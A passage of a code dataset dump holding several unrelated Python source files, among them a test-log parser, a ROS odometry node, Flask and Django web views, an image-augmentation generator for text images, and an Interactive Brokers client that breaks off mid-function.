app.exec_()\n\n","sub_path":"Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"132291418","text":"import sys\nimport re\nimport pdb\nimport os.path\n\n#res_path = \"/Users/tylersorensen/Documents/Github/fp_repo2/Amber-Testing-Framework/Driver_and_Comparator_Results\"\nres_path = \"/home/tsorensen/github/Amber-Testing-Framework_ssh/Amber-Testing-Framework/Driver_and_Comparator_Results\"\n\nVENDOR = \"CUDA\"\n\n# Pass in the input log\nassert(len(sys.argv) == 2)\nfname = sys.argv[1]\n\ndef get_file_contents(fname):\n f = open(fname)\n data = f.read()\n f.close()\n return data\n\nraw_data = get_file_contents(fname)\n\ndname = fname.split(\"/\")[-1].replace(\".txt\",\"\")\nprint(dname)\n\n\ntests = raw_data.split(\"Running \")[1:]\nprint(tests[0])\n\ndef get_hueristic(t):\n if \"chunked\" in t:\n return \"chunked\"\n if \"round_robin\" in t:\n return \"round_robin\"\n if \"plain\" in t:\n return \"plain\"\n assert(0)\n\ndef get_run(t):\n if \"2t_2i\" in t:\n return \"2t_2i\"\n if \"2t_3i\" in t:\n return \"2t_3i\"\n if \"2t_4i\" in t:\n return \"2t_4i\"\n if \"3t_3i\" in t:\n return \"3t_3i\"\n if \"3t_4i\" in t:\n return \"3t_4i\"\n assert(0)\n\ndef get_killed_success(t):\n #pdb.set_trace()\n #print(t)\n k = re.search(\"killed: (\\d+)\",t)[1]\n s = re.search(\"Success: (\\d+)\",t)[1]\n return k,s\n\ndef get_id(t):\n first_line = t.split(\"\\n\")[0]\n to_return = first_line.split(\"_\")[-1]\n #print(to_return)\n return to_return \n\nresults = {\"3t_4i\" : [],\n \"3t_3i\" : [],\n \"2t_2i\" : [],\n \"2t_3i\" : [],\n \"2t_4i\" : []}\n\nresult_map = {\"3t_4i\" : \"3_thread_4_instruction\",\n \"3t_3i\" : \"3_thread_3_instruction\",\n \"2t_2i\" : \"2_thread_2_instruction\",\n \"2t_3i\" : \"2_thread_3_instruction\",\n \"2t_4i\" : \"2_thread_4_instruction\"}\n\n\nruns = set()\n \nfor t in tests:\n h = get_hueristic(t)\n r = get_run(t)\n i = get_id(t)\n runs.add(r)\n k,s = get_killed_success(t)\n results[r].append((i,h,k,s))\n\ndef get_entry(i, d, h):\n for e in d:\n if e[0] == str(i) and e[1] == h:\n k = int(e[2])\n s = int(e[3])\n total = k + s\n if s == total:\n return \"P\",0\n else:\n return \"F (\" + str(k) + \"/\" + str(total) + \")\",k\n\n assert(0)\n \n\nfor r in runs:\n csv = [\"Test File Name,No saturation Result,Round Robin Saturation Result,Chunking Saturation Result,All Passed\"]\n\n total_e = 0\n total_rr = 0\n total_c = 0\n total_ap = 0\n #if (r == '3t_3i'):\n # pdb.set_trace()\n for i in range(len(results[r])):\n name = str(i)\n e,t = get_entry(i, results[r], \"plain\")\n total_e += t\n \n #rr,t = get_entry(i, results[r], \"round_robin\")\n rr = \"P\"\n total_rr += 0\n \n #c,t = get_entry(i, results[r], \"chunked\")\n c = \"P\"\n total_c += 0\n\n ap = \"F\"\n total_ap += 1\n if e == \"P\":\n ap = \"P\"\n total_ap -= 1\n line = \",\".join([name,e,rr,c, ap])\n csv.append(line)\n sum_line = \"Total failures:,\"+ \",\".join([str(total_e), str(total_rr), str(total_c), str(total_ap)])\n csv.append(sum_line)\n\n #if r == '3t_3i':\n # pdb.set_trace()\n fname = dname + \".csv\"\n fname = os.path.join(res_path, result_map[r], VENDOR, fname)\n print(fname)\n f = open(fname,'w')\n f.write(\"\\n\".join(csv))\n f.close()\n","sub_path":"extra_scripts/parse_subgroup_logs.py","file_name":"parse_subgroup_logs.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428819428","text":"#!/usr/bin/env python\nimport rospy\nimport tf\nfrom geometry_msgs.msg import PoseStamped\nfrom nav_msgs.msg import Odometry\n\n\nclass SimuNav:\n def __init__(self):\n self.nav_to_robot = tf.TransformBroadcaster()\n self.robot_to_laser = tf.TransformBroadcaster()\n self.odom_publisher = rospy.Publisher('odom', Odometry, queue_size=10)\n\n def broadcast_odom(self, pose_msg):\n position = (pose_msg.pose.position.x, pose_msg.pose.position.y, pose_msg.pose.position.z)\n orientation = (pose_msg.pose.orientation.x, pose_msg.pose.orientation.y,\n pose_msg.pose.orientation.z, pose_msg.pose.orientation.w)\n self.nav_to_robot.sendTransform(position,\n orientation,\n rospy.Time.now(),\n \"base_link\",\n \"odom\")\n\n odom = Odometry()\n odom.header.stamp = rospy.Time.now()\n odom.header.frame_id = \"odom\"\n\n odom.pose.pose.position.x = pose_msg.pose.position.x\n odom.pose.pose.position.y = pose_msg.pose.position.y\n odom.pose.pose.position.z = pose_msg.pose.position.z\n\n odom.pose.pose.orientation.x = pose_msg.pose.orientation.x\n odom.pose.pose.orientation.y = pose_msg.pose.orientation.y\n odom.pose.pose.orientation.z = pose_msg.pose.orientation.z\n odom.pose.pose.orientation.w = pose_msg.pose.orientation.w\n\n odom.child_frame_id = \"base_link\"\n odom.twist.twist.linear.x = 0.0\n odom.twist.twist.linear.y = 0.0\n odom.twist.twist.angular.z = 0.0\n\n self.odom_publisher.publish(odom)\n\n def broadcast_static_transform(self):\n self.robot_to_laser.sendTransform((0, 0, 0),\n tf.transformations.quaternion_from_euler(0, 0, 0),\n rospy.Time.now(),\n \"laser\",\n \"base_link\")\n\n def setup_node(self):\n rospy.init_node('simu_nav_node')\n rospy.Subscriber(\"slam_out_pose\", PoseStamped, self.broadcast_odom)\n print(\"Ready to transform\")\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n self.broadcast_static_transform()\n rate.sleep()\n\n\nif __name__ == '__main__':\n broadcaster = SimuNav()\n broadcaster.setup_node()","sub_path":"navigation/scripts/simu_nav_node.py","file_name":"simu_nav_node.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460526700","text":"# -*- coding: utf-8 -*-\n\nfrom db.models.account import User, UserInfo\n\n\nclass UserResourceAPIMixin(object):\n \"\"\"为请求处理器提供操作用户资源的API\n\n 要求宿主类实现`.db.session`来访问SQLAlchemy的数据库session。\n 要求宿主类实现`.current_user`来访问当前用户登录的session。\n \"\"\"\n\n def user_info_check(self, form):\n \"\"\"用户个人信息检查\"\"\"\n result = {\"status\": 400, \"message\": \"Failed\", \"data\": {}}\n if form[\"url\"]:\n if not (form[\"url\"].startswith(\"http://\") or\n form[\"url\"].startswith(\"https://\")):\n form[\"url\"] = \"http://\" + form[\"url\"]\n form[\"nickname\"] = form[\"nickname\"] or self.current_user.username\n if len(form[\"nickname\"]) > User.nickname.type.length:\n result[\"data\"] = {\n \"field\": \"nickname\",\n \"message\": \"昵称不能超过{}个字符!\".format(\n User.nickname.type.length)\n }\n elif len(form[\"school\"]) > UserInfo.school.type.length:\n result[\"data\"] = {\n \"field\": \"school\",\n \"message\": \"学校不能超过{}个字符!\".format(\n UserInfo.school.type.length)\n }\n elif len(form[\"major\"]) > UserInfo.major.type.length:\n result[\"data\"] = {\n \"field\": \"major\",\n \"message\": \"专业不能超过{}个字符!\".format(\n UserInfo.major.type.length)\n }\n elif len(form[\"url\"]) > UserInfo.url.type.length:\n result[\"data\"] = {\n \"field\": \"url\", \"message\": \"个人网址不能超过{}个字符!\".format(\n UserInfo.url.type.length)\n }\n elif len(form[\"about\"]) > UserInfo.about.type.length:\n result[\"data\"] = {\n \"field\": \"about\",\n \"message\": \"个人简介不能超过{}个字符!\".format(\n UserInfo.about.type.length)\n }\n else:\n return {\"status\": 200, \"message\": \"OK\"}\n return result\n\n pass\n","sub_path":"application/account/utils/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103524001","text":"from flask import request, Blueprint\nfrom flask_login import login_required\nfrom FlaskApp.modulo.main_utils import MainUtils\nfrom FlaskApp.mongo.entomo_crud import EntomoCrud\nfrom FlaskApp.mongo.epidem_crud import EpidemCrud\nfrom rpy2.robjects import pandas2ri\nfrom bson.json_util import dumps\nimport traceback, pandas as pd, rpy2.robjects as robjects, json, bisect\n\n# Metodo/Archivo:\n# filter.py\n# Descripción:\n# En este archivo están contenidos todos los servicios que el cliente pide al servidor\n# que no están relacionados directamente con la ejecución de los análisis de\n# clasificación.\n\nfilter_module = Blueprint('filter_module', __name__)\n\n# Metodo/Archivo:\n# /getMinMax\n# Descripción:\n# Retorna todas los nombres de variables numéricas de los datos entomológicos\n# ó epidemiológicos. Para cada nombre asocia el máximo y mínimo valor númerico\n# del atributo.\n# Retorno:\n#\tDatos entomológicos o epidemiológicos con mínimos y máximos.\n\n@filter_module.route(\"/getMinMax\", methods=['POST'])\n@login_required\ndef get_min_max_heads():\n data = request.get_json()\n dates = MainUtils.to_date_times(data['startDate'], data['endDate'])\n type = data['type']\n try:\n if type == \"epidem\":\n resp = {'msg':\"OK\", 'epidemMinMax': EpidemCrud.get_min_max_headers(dates)}\n elif type == \"entomo\":\n resp = {'msg':\"OK\", 'entomoMinMax': EntomoCrud.get_min_max_headers(dates)}\n return dumps(resp)\n except Exception as e:\n traceback.print_exc()\n return dumps({'msg': str(e)})\n\n# Metodo/Archivo:\n# /getClassificationByClassData\n# Descripción:\n# Obtiene los datos de la base de datos y los clasifica por los\n# factores de alguna clase seleccionada por el cliente.\n# Retorno:\n#\tEl conjunto de datos. Cada dato asociado a algún factor de la clase.\n\n@filter_module.route(\"/getClassificationByClassData\", methods=['POST'])\n@login_required\ndef get_factor_data():\n try:\n data = request.get_json()\n if len(data['projection']) == 0:\n raise Exception('NoProjection')\n bd_data = MainUtils.get_bd_data(data)\n\n pandas2ri.activate()\n bd_data = pd.DataFrame(list(bd_data))\n\n cluster_data = pd.DataFrame()\n if bd_data.size > 0:\n bd_data.rename(columns={data['selectedVariable']: 'columnFactor'}, inplace=True)\n robjects.globalenv['dataToAnalyse'] = bd_data\n levels = robjects.r(\"levels(dataToAnalyse[,'columnFactor'])\")\n cluster_data = pd.DataFrame({'columnFactor': levels, 'colorCluster': list(range(0, len(levels)))})\n bd_data = pd.merge(bd_data, cluster_data, on='columnFactor')\n bd_data.rename(columns={'columnFactor': data['selectedVariable']}, inplace=True)\n\n resp = MainUtils.json_df(bd_data)\n\n return dumps({'Rdata': {'markers': resp, 'convention': MainUtils.json_df(cluster_data),\n 'total': {len(resp)}}, 'msg': \"OK\"})\n except Exception as e:\n traceback.print_exc()\n return dumps({'msg': str(e)})\n\n# Metodo/Archivo:\n# /getClassificationByNumericData\n# Descripción:\n# Recibe una cadena con intervalos en el formato \"#,#,#...\"\n# con esto, crea un conjunto de intervalos los cuales servirán\n# para asociar los datos en función de algún atributo numérico seleccionado\n# por el cliente\n# Retorno:\n# Retorna el conjunto de intervalos y los datos asociados a cada intervalo.\n\n@filter_module.route(\"/getClassificationByNumericData\", methods=['POST'])\n@login_required\ndef get_numeric_data():\n data = request.get_json()\n numeric = data['numeric']\n bd_data = MainUtils.get_bd_data(data)\n\n bd_data = pd.DataFrame(list(bd_data))\n column = list(bd_data[numeric]) if bd_data.size > 0 else []\n\n intervals_array = sorted(list(set(map(int,data['intervals'].split(',')))))\n intervals_size = len(intervals_array)\n intervals = []\n for i in range(0,intervals_size-1):\n intervals.append({'columnFactor': '( ' + str(intervals_array[i]) + '-' + str(intervals_array[i+1]) + ' ]', 'colorCluster': i+1})\n intervals.insert(0,{'columnFactor': '<=' + str(intervals_array[0]), 'colorCluster': 0})\n intervals.append({'columnFactor': '> ' + str(intervals_array[intervals_size-1]), 'colorCluster': intervals_size})\n\n for i in range(0,len(column)):\n bd_data.set_value(i, 'colorCluster', bisect.bisect_left(intervals_array,int(column[i])))\n\n resp = json.loads(bd_data.to_json(orient='records'))\n return dumps({'msg': \"OK\", 'Rdata': {'markers': resp, 'convention': intervals, 'total': {len(resp)}}})\n\n\n# Metodo/Archivo:\n# /initController\n# Descripción:\n# Entrega los datos iniciales al cliente.\n# Retorno:\n# Headers numéricos entomológicos y epidemiológicos\n# Niveles de cada clase\n# Headers de clases entomológicas y epidemiológicas\n\n@filter_module.route(\"/initController\", methods=['GET'])\n@login_required\ndef init_controller():\n entomo_headers = EntomoCrud.get_fac_headers()\n epidem_headers = EpidemCrud.get_fac_headers()\n entomo_distincts = {}\n epidem_distincts = {}\n for i in range(0, len(entomo_headers)):\n entomo_distincts[entomo_headers[i]] = EntomoCrud.get_distincts(entomo_headers[i])\n for i in range(0, len(epidem_headers)):\n epidem_distincts[epidem_headers[i]] = EpidemCrud.get_distincts(epidem_headers[i])\n\n init_objects = {'entomoNumHeaders': EntomoCrud.get_num_headers(),\n 'epidemNumHeaders': EpidemCrud.get_num_headers(),\n 'entomoFacHeaders': entomo_headers,\n 'epidemFacHeaders': epidem_headers,\n 'entomoClassFactors': entomo_distincts,\n 'epidemClassFactors': epidem_distincts};\n return dumps(init_objects)\n","sub_path":"Development/FlaskApp/FlaskApp/modulo/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"55387686","text":"#! /usr/bin/env python\nimport os\nfrom optparse import OptionParser\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [options] infile\"\n parser = OptionParser(usage)\n parser.add_option(\"-o\", dest=\"output_file\", help=\"Output file\", metavar=\"OUTPUT\")\n (options, args) = parser.parse_args()\n if not options.output_file:\n parser.error(\"Output file not specified (-o)\")\n\n dynamo_home = os.environ[\"DYNAMO_HOME\"]\n classpath = \"%s/share/java/bob-light.jar\" % dynamo_home\n ret = os.system(\"java -cp %s com.dynamo.bob.pipeline.TextureGenerator %s %s\" % (classpath, args[0], options.output_file))\n if ret != 0:\n raise Exception(\"Failed to compile texture (%d)\" % ret)\n\n","sub_path":"engine/graphics/src/texc.py","file_name":"texc.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"176344809","text":"\"\"\"\nauthor: \"caihua\"\ndate: 2019/5/10\nEmail: hanscalcai@163.com\n\"\"\"\n\nimport random\nimport os\nimport numpy as np\nimport multiprocessing\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nfrom imgaug import multicore\nfrom imgaug.augmentables.batches import Batch\nimport functools\nfrom imgaug.augmentables.batches import UnnormalizedBatch\nfrom PIL import Image, ImageDraw, ImageFont\nimport logging\nlogger = logging.getLogger()\nG = 0\n\n\ndef gen_img(label, font_color, font_size, font_path):\n try:\n font = ImageFont.truetype(font_path, font_size)\n (w, h) = font.getsize(label)\n except Exception as e:\n logger.error('can not load font: {}, ignored'.format(font_path))\n return\n bg_h = int(h * 1.2)\n bg_w = int(w + h)\n bg_img = Image.new(\"RGB\", (bg_w, bg_h), (255, 255, 255))\n draw = ImageDraw.Draw(bg_img)\n draw.text((int(0.5 * h), int(0.08 * h)), label, font=font, fill=font_color)\n img_array = np.array(bg_img).astype(np.uint8)\n return img_array\n\n\ndef gen_img_helper(args):\n return gen_img(*args)\n\n\nclass ImageGenerator(object):\n \n def __init__(self, char_list, raw_choose_num=None, aug_choose_num=None,\n choose_ratio=0.5, aug_ratio=0.2, font_path_list=[], font_dir=None, cores=4):\n \"\"\"\n \n :param char_list:\n :param raw_choose_num: choose the num of raw generate images\n :param aug_choose_num: 最终得到的增强图片的数量\n :param aug_ratio:\n :param font_path_list:\n :param font_dir:\n :param cores:\n \"\"\"\n self.char_list = char_list\n logger.info('prepare char len:{}'.format(len(self.char_list)))\n assert len(font_path_list) > 0 or font_dir is not None\n if font_dir is not None:\n self.font_path_list = [os.path.join(font_dir, font_name) for font_name in os.listdir(font_dir) \\\n if len(font_name.rsplit('.', 1)) > 1 and font_name.rsplit('.', 1)[1] not \\\n in ['ttf', 'otf'] and not font_name.startswith('.')]\n else:\n self.font_path_list = font_path_list\n logger.info('font sum:{}'.format(len(self.font_path_list)))\n logger.info('prepare generate img sum:{}'.format(len(self.char_list) * len(self.font_path_list)))\n self.raw_choose_num = raw_choose_num\n self.aug_choose_num = aug_choose_num\n self.choose_ratio = choose_ratio\n self.aug_ratio = aug_ratio\n self.cores = cores\n sometimes = lambda aug: iaa.Sometimes(aug_ratio, aug)\n self.seq = iaa.Sequential(\n [\n sometimes(iaa.CropAndPad(\n percent=(-0.05, 0.1),\n pad_mode=ia.ALL,\n pad_cval=(0, 255)\n )),\n sometimes(iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\n translate_percent={\"x\": (-0.1, 0.1), \"y\": (-0.05, 0.05)},\n rotate=(-5, 5),\n shear=(-3, 3),\n order=[0, 1],\n cval=(0, 255),\n mode=ia.ALL\n )),\n # execute 0 to 5 of the following augmenters per image\n iaa.SomeOf((0, 5),\n [\n iaa.OneOf([\n iaa.GaussianBlur((0, 0.5)),\n iaa.AverageBlur(k=(1, 3)),\n iaa.MedianBlur(k=(1, 3)),\n iaa.Dropout(p=0.05),\n iaa.CoarseDropout(p=0.05, size_percent=0.20),\n iaa.Salt(p=0.03),\n iaa.GammaContrast(gamma=0.81),\n iaa.Emboss(alpha=1, strength=0.5)\n ]),\n ],\n random_order=True\n )\n ],\n random_order=True\n )\n self.raw_img_dict = {}\n self.aug_imgs = []\n\n def clear(self):\n self.raw_img_dict = {}\n self.aug_imgs = []\n\n def gen_images(self):\n \"\"\"\n :return: 参数列表,形成的图片列表\n \"\"\"\n font_size = 20\n font_color = (0, 0, 0)\n args_list = []\n for font_id, font_path in enumerate(self.font_path_list):\n for label_id, label in enumerate(self.char_list):\n args_list.append([label, font_color, font_size, font_path])\n logger.info('begin generate bg img')\n if self.cores <= 1:\n bg_imgs = [gen_img(*arg) for arg in args_list]\n else:\n pool = multiprocessing.Pool(processes=int(self.cores))\n bg_imgs = pool.map(gen_img_helper, args_list)\n pool.close()\n pool.join()\n logger.info('success generate all bg img')\n return [args_list[i] + [bg_imgs[i]] for i in range(len(args_list))]\n \n def choose_raw_img(self, args_img_list):\n valid_args_img_list = [args_img for args_img in args_img_list if args_img[-1] is not None]\n raw_choose_num = int(len(args_img_list) * self.choose_ratio) if self.raw_choose_num is None \\\n else min(self.raw_choose_num, len(args_img_list) * self.choose_ratio)\n logger.info('choose raw img sum:{}'.format(raw_choose_num))\n raw_args_img_list = random.sample(valid_args_img_list, raw_choose_num)\n raw_imgs_list = []\n for i, raw_args_img in enumerate(raw_args_img_list):\n label, font_color, font_size, font_path, img = raw_args_img\n img_name = '{}_raw.jpg'.format(i)\n self.raw_img_dict[img_name] = {\"img\": img, \"label\": label, \"font_size\": font_size,\n \"font_color\": font_color, \"font_path\": font_path}\n raw_imgs_list.append(img)\n return raw_imgs_list\n \n def aug_img(self, args_img_list):\n logger.info('begin generate aug img')\n if self.cores <= 1:\n img_list = [args_img[-1] for args_img in args_img_list if args_img[-1] is not None]\n image_aug_list = self.seq.augment_images(img_list)\n else:\n img_args_list_copy = args_img_list.copy()\n char_sum = len(self.char_list)\n c = 0\n batches = []\n batch_imgs = []\n while img_args_list_copy:\n label, font_color, font_size, font_path, img = img_args_list_copy.pop(0)\n if img is not None:\n batch_imgs.append(img)\n c += 1\n if c == char_sum:\n if len(batch_imgs) > 0:\n batch = Batch(batch_imgs)\n batches.append(batch)\n c = 0\n batch_imgs = []\n seq_pool = multicore.Pool(self.seq, processes=self.cores)\n gen_img_batches = seq_pool.map_batches(batches, chunksize=4)\n seq_pool.close()\n seq_pool.join()\n image_aug_list = []\n for gen_img_batch in gen_img_batches:\n image_aug_list.extend(gen_img_batch.images_unaug)\n logger.info('success generate aug img')\n return image_aug_list\n","sub_path":"img_generator.py","file_name":"img_generator.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524051614","text":"\nimport datetime\n\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.views.generic import (CreateView, ListView, UpdateView, View,\n DetailView, TemplateView)\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.shortcuts import render\n\nfrom .models import Articulo, HistorialPreciosCompra, HistorialPreciosVenta\nfrom .forms import ArticuloForm, ArticuloDeleteForm, MarcaForm, RubroForm, \\\n ActualizacionPrecioForm\n\nfrom .helpers import DibujarBarcode\nfrom . import helpers\n\n\nclass ArticuloCreateView(SuccessMessageMixin, CreateView):\n\n model = Articulo\n form_class = ArticuloForm\n success_url = '/articulos/alta'\n success_message = 'El Árticulo fue creado con éxito'\n\n def get_context_data(self, **kwargs):\n context = super(ArticuloCreateView, self).get_context_data(**kwargs)\n context['marca_form'] = MarcaForm\n context['rubro_form'] = RubroForm\n return context\n\n def form_valid(self, form):\n return super(ArticuloCreateView, self).form_valid(form)\n\n def form_invalid(self, form):\n messages.error(self.request, 'El formulario contiene errores')\n return super(ArticuloCreateView, self).form_invalid(form)\n\n def get_success_url(self):\n return self.success_url\n\n\nclass ArticuloListView(ListView):\n\n queryset = Articulo.objects.filter(baja=False)\n paginate_by = 6\n\n def get_queryset(self):\n qs = Articulo.objects.filter(baja=False)\n if 'texto_buscar' in self.request.GET:\n if self.request.GET.get('texto_buscar') is not '':\n texto_buscar = self.request.GET.get('texto_buscar')\n qs = helpers.buscar_codigo(texto_buscar)\n qs = helpers.buscar_descripcion(qs, texto_buscar)\n qs = helpers.buscar_precio_venta(qs, texto_buscar)\n qs = helpers.buscar_precio_compra(qs, texto_buscar)\n qs = helpers.buscar_stock(qs, texto_buscar)\n qs = helpers.buscar_stock_minimo(qs, texto_buscar)\n qs = helpers.buscar_fecha_compra(qs, texto_buscar)\n return qs\n\n\nclass ArticuloUpdateView(SuccessMessageMixin, UpdateView):\n\n model = Articulo\n form_class = ArticuloForm\n success_url = '/articulos/listado/'\n success_message = 'El Árticulo se modifico con éxito'\n\n def get_context_data(self, **kwargs):\n context = super(ArticuloUpdateView, self).get_context_data(**kwargs)\n context['marca_form'] = MarcaForm\n context['rubro_form'] = RubroForm\n return context\n\n def form_valid(self, form):\n articulo = Articulo.objects.get(pk=self.kwargs['pk'])\n historial_precio_venta = HistorialPreciosVenta(articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=\n form.data['precio_venta'])\n historial_precio_venta.save()\n historial_precio_compra = HistorialPreciosCompra(articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=\n form.data[\n 'precio_compra'])\n\n historial_precio_compra.save()\n return super(ArticuloUpdateView, self).form_valid(form)\n\n\nclass ArticuloDeleteView(View):\n\n def get(self, request, *args, **kwargs):\n\n articulo_delete_form = ArticuloDeleteForm()\n object = Articulo.objects.get(pk=self.kwargs['pk'])\n return render(self.request, 'articulos/articulo_confirm_delete.html',\n {'form': articulo_delete_form,\n 'articulo': object})\n\n def post(self, request, *args, **kwargs):\n\n articulo = Articulo.objects.get(pk=self.kwargs['pk'])\n articulo_delete_form = ArticuloDeleteForm(instance=articulo,\n data=self.request.POST)\n if articulo_delete_form.is_valid():\n articulo_delete_form.instance.fecha_baja = \\\n datetime.datetime.now().date()\n articulo_delete_form.instance.baja = True\n articulo_delete_form.save()\n messages.error(request, 'El árticulo fue eliminado '\n 'de forma correcta')\n return HttpResponseRedirect('/articulos/listado/')\n\n\nclass ArticuloDetailView(DetailView):\n\n model = Articulo\n template_name = 'articulos/articulo_detail.html'\n\n\ndef barcode(request, pk):\n\n articulo = Articulo.objects.get(pk=pk)\n d = DibujarBarcode(articulo.codigo_barra)\n binaryStuff = d.asString('gif')\n return HttpResponse(binaryStuff, 'image/gif')\n\n\nclass ActualizarPrecioTemplateView(TemplateView):\n\n template_name = 'articulos/articulo_actualizar_precios.html'\n\n def get_context_data(self, **kwargs):\n context = super(ActualizarPrecioTemplateView, self)\\\n .get_context_data(**kwargs)\n context['form'] = ActualizacionPrecioForm()\n return context\n\n def post(self, request, *args, **kwargs):\n busqueda = {}\n form_articulo_actualizar = ActualizacionPrecioForm(data=\n self.request.POST)\n if form_articulo_actualizar.is_valid():\n if 'rubro' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['rubro'] != '':\n busqueda['rubro__id'] = form_articulo_actualizar.data['rubro']\n if 'marca' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['marca'] != '':\n busqueda['marca__id'] = form_articulo_actualizar.data['marca']\n if 'codigo_desde' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['codigo_desde'] != '':\n busqueda['codigo_barra__lte'] = \\\n form_articulo_actualizar.data['codigo_desde']\n if 'codigo_hasta' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['codigo_hasta'] != '':\n busqueda['codigo_barra__gte'] = \\\n form_articulo_actualizar.data['codigo_hasta']\n articulos = Articulo.objects.filter(**busqueda)\n\n if 'variacion' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['variacion'] == 'costo':\n\n if 'moneda' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['moneda'] == 'pesos':\n for articulo in articulos:\n resultado = str(int(articulo.precio_compra) +\n int(form_articulo_actualizar.\n data['numero']))\n\n historial_precio_compra = HistorialPreciosCompra(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_compra)\n historial_precio_compra.save()\n\n articulo.precio_compra = resultado\n articulo.save()\n else:\n\n for articulo in articulos:\n aumento = (int(articulo.precio_compra) *\n int(form_articulo_actualizar.\n data['numero']))/100\n resultado = int(articulo.precio_compra) +\\\n int(aumento)\n\n historial_precio_compra = HistorialPreciosCompra(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_compra)\n historial_precio_compra.save()\n\n articulo.precio_compra = resultado\n articulo.save()\n\n else:\n if 'moneda' in form_articulo_actualizar.data:\n if form_articulo_actualizar.data['moneda'] == 'pesos':\n\n for articulo in articulos:\n resultado = str(int(articulo.precio_venta) + \\\n int(form_articulo_actualizar.data[\n 'numero']))\n\n historial_precio_venta = HistorialPreciosVenta(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_venta)\n historial_precio_venta.save()\n\n articulo.precio_venta = resultado\n articulo.save()\n else:\n for articulo in articulos:\n aumento = (int(articulo.precio_venta) *\n int(form_articulo_actualizar.\n data['numero'])) / 100\n resultado = int(articulo.precio_venta) + \\\n int(aumento)\n\n historial_precio_venta = HistorialPreciosVenta(\n articulo=articulo,\n fecha_modificacion=datetime.datetime.now(),\n precio=articulo.precio_venta)\n historial_precio_venta.save()\n\n articulo.precio_venta = resultado\n articulo.save()\n\n messages.success(self.request, 'El precio del Árticuo se '\n 'actualizo')\n return HttpResponseRedirect('/articulos/actualizar/precios/')\n else:\n return render(self.request,\n 'articulos/articulo_actualizar_precios.html',\n {'form': form_articulo_actualizar})\n\n\nclass HistorialPreciosVentaListView(ListView):\n\n model = HistorialPreciosVenta\n template_name = 'articulos/historial_precio_venta.html'\n paginate_by = 20\n\n\nclass HistorialPreciosCompraListView(ListView):\n\n model = HistorialPreciosCompra\n template_name = 'articulos/historial_precio_compra.html'\n paginate_by = 20\n\n\nclass ArticuloListPrint(ListView):\n\n queryset = Articulo.objects.filter(baja=False)\n template_name = 'articulos/articulo_list_print.html'\n\n\nclass EtiquetasGondolaTemplateView(ListView):\n\n queryset = Articulo.objects.filter(baja=False)\n template_name = 'articulos/articulos_list_etiquetas.html'\n paginate_by = 10\n\n def get_queryset(self):\n qs = []\n if 'texto_buscar' in self.request.GET:\n if self.request.GET.get('texto_buscar') is not '':\n texto_buscar = self.request.GET.get('texto_buscar')\n qs = helpers.buscar_codigo(texto_buscar)\n qs = helpers.buscar_descripcion(qs, texto_buscar)\n qs = helpers.buscar_precio_venta(qs, texto_buscar)\n qs = helpers.buscar_precio_compra(qs, texto_buscar)\n qs = helpers.buscar_stock(qs, texto_buscar)\n qs = helpers.buscar_stock_minimo(qs, texto_buscar)\n qs = helpers.buscar_fecha_compra(qs, texto_buscar)\n if len(qs) == 0:\n qs = Articulo.objects.filter(rubro__descripcion=texto_buscar)\n return qs\n","sub_path":"apps/articulos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63376676","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 24 03:20:55 2020\n\n@author: boo\n\"\"\"\n\nfrom ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nimport threading\nimport time\n\nimport pandas as pd\n\nclass TradingApp(EWrapper, EClient): \n def __init__(self):\n EClient.__init__(self,self) \n self.data={} \n \n \n def historicalData(self, reqId, bar):\n if reqId not in self.data:\n self.data[reqId]=[{\n \"Date\": bar.date,\n \"Open\": bar.open,\n \"High\": bar.high,\n \"Low\": bar.low,\n \"Close\":bar.close,\n \"Volume\":bar.volume,\n }]\n else:\n self.data[reqId].append({\n \"Date\": bar.date,\n \"Open\": bar.open,\n \"High\": bar.high,\n \"Low\": bar.low,\n \"Close\":bar.close,\n \"Volume\":bar.volume,\n })\n print(self.data)\n\n\ndef nse_contract(symbol):\n contract=Contract()\n contract.symbol=symbol\n contract.secType = \"STK\"\n contract.exchange = \"NSE\" \n contract.currency = \"INR\" \n return contract\n\n\ndef histData(req_num,contract, durationStr='1 M',barSizeSetting='1 day'):\n app.reqHistoricalData (reqId=req_num,\n contract=contract,\n 